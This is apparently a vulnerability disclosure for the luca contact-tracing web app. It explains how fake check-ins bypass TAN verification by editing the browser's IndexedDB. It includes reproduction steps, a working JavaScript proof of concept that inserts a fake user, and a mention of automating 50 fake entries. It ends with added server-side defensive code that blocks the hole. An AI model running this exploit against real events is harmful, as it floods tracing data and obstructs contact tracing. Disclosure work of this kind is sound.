Fake Checkin without TAN possible
It is possible to check in to an event without entering any details in the web app. The whole registration process can be circumvented by directly changing entries in the browser's IndexedDB. This is a serious problem because a malicious user can automate the process and populate an event with large amounts of fake data.
Using a Selenium script, I was able to add 50 fake people to a private event (which I created myself) within a couple of minutes.
If it is not clear already: the problem with lots of fake data is that it makes tracing the actual key contacts infeasible, or at least very time-consuming.
Steps to reproduce manually
- Get the meeting link from a QR code, e.g.
  https://app.luca-app.de/webapp/meeting/7dbb0796-c474-4c7b-baf3-dccb3ea233b0#eyJmbiI2ImV0r5QiLCJsbiI6InQifQ==
  (called Meeting_Link in the following).
- Go to the website referred to by the Meeting_Link.
- You should now arrive at a page where you are prompted to accept the terms and conditions, etc.
- Execute a snippet similar to the one below to populate a fake user.
- Enter the Meeting_Link in the URL bar and hit enter.
- You will now be checked in to the meeting as the fake user you just populated.
The following code is meant as a proof of concept. It was tested on Firefox (78.9.0esr) and Chrome (89.0.4389.114).
The basis for the snippet was taken from this article: https://developer.chrome.com/docs/devtools/storage/indexeddb/
```js
// Open the web app's IndexedDB database (name and version as used by the app).
let request = indexedDB.open('luca', 33);
request.onsuccess = function(e) {
  let db = e.target.result;
  // Read-write transaction on the object store holding the registered user.
  let trans = db.transaction(["users"], "readwrite");
  let userObjectStore = trans.objectStore('users');
  // Create a fake user
  const user = {
    firstName: 'Alice',
    lastName: 'Carter',
    version: '3', phoneNumber: '0123999445', email: '',
    street: 'jasonstreet', city: 'jennigton', houseNumber: '10', zip: 'zippy',
    userId: "1d7b4f55-5772-4bff-b9ea-9dc564836126"
  };
  // Clear db to get rid of current user
  userObjectStore.clear();
  // Add fake user to the db
  let request1 = userObjectStore.put(user);
  request1.onsuccess = function(e) {
    console.log('Added user');
  };
};
```
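As an added illustration from the defender's side (this is not luca's code; the endpoint, data structures, thresholds and sample IDs are all assumptions made for the example): the root cause is that the browser's IndexedDB record is treated as proof of registration. A server that keeps its own record of TAN-verified registrations, rejects check-ins for user IDs it never verified, and throttles bursts of check-ins per event closes the hole and also surfaces the kind of automated flooding this report describes.

```javascript
// Added example, not luca's code. Models a check-in endpoint that only
// trusts server-side state. All identifiers below are hypothetical.

// Server-side registry of users whose phone number was confirmed via TAN.
// In the vulnerable flow, the browser's IndexedDB record was the only
// "proof" of registration; here the server keeps its own.
const verifiedUsers = new Map(); // userId -> { phoneNumber, verifiedAt }

// Called by the (assumed) TAN-confirmation handler, never by the client.
function registerVerifiedUser(userId, phoneNumber, now = Date.now()) {
  verifiedUsers.set(userId, { phoneNumber, verifiedAt: now });
}

// Recent check-ins per event, used for duplicate detection and throttling.
const checkinsPerEvent = new Map(); // eventId -> [{ userId, ts }]
const WINDOW_MS = 60 * 1000;        // assumed sliding window
const MAX_CHECKINS_PER_WINDOW = 20; // assumed threshold per event

// UUIDv4 shape check, so malformed IDs are rejected before any lookup.
function isUuidV4(s) {
  return /^[0-9a-f]{8}-[0-9a-f]{4}-4[0-9a-f]{3}-[89ab][0-9a-f]{3}-[0-9a-f]{12}$/i.test(s);
}

// Returns { ok: true } or { ok: false, reason } so callers can log the reason.
function handleCheckin(eventId, userId, now = Date.now()) {
  if (typeof userId !== 'string' || !isUuidV4(userId)) {
    return { ok: false, reason: 'malformed_user_id' };
  }
  // This check is what closes the reported hole: a record invented in the
  // browser has no matching server-side verified registration.
  if (!verifiedUsers.has(userId)) {
    return { ok: false, reason: 'unverified_user' };
  }

  const recent = (checkinsPerEvent.get(eventId) || [])
    .filter(c => now - c.ts < WINDOW_MS);

  if (recent.some(c => c.userId === userId)) {
    return { ok: false, reason: 'duplicate' };
  }
  // A burst of distinct verified users is the signal for automated flooding;
  // throttling it also gives operators a concrete event to alert on.
  if (recent.length >= MAX_CHECKINS_PER_WINDOW) {
    return { ok: false, reason: 'rate_limited' };
  }

  recent.push({ userId, ts: now });
  checkinsPerEvent.set(eventId, recent);
  return { ok: true };
}

// Constructed sample run (IDs and phone number are made up).
const SAMPLE_USER = '11111111-2222-4333-8444-555555555555';
console.log(handleCheckin('event-A', SAMPLE_USER));   // { ok: false, reason: 'unverified_user' }
registerVerifiedUser(SAMPLE_USER, '+490000000000');
console.log(handleCheckin('event-A', SAMPLE_USER));   // { ok: true }
```

The important design choice is that `verifiedUsers` is populated only by the server's own TAN flow; nothing the client sends can add to it, so clearing or rewriting the browser's local store gains an attacker nothing. The per-event window is a coarse control; the exact threshold would be tuned to real venue sizes, and the `rate_limited` and `unverified_user` reasons are the events a monitoring pipeline should count.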
If you have any questions or need more evidence, let me know.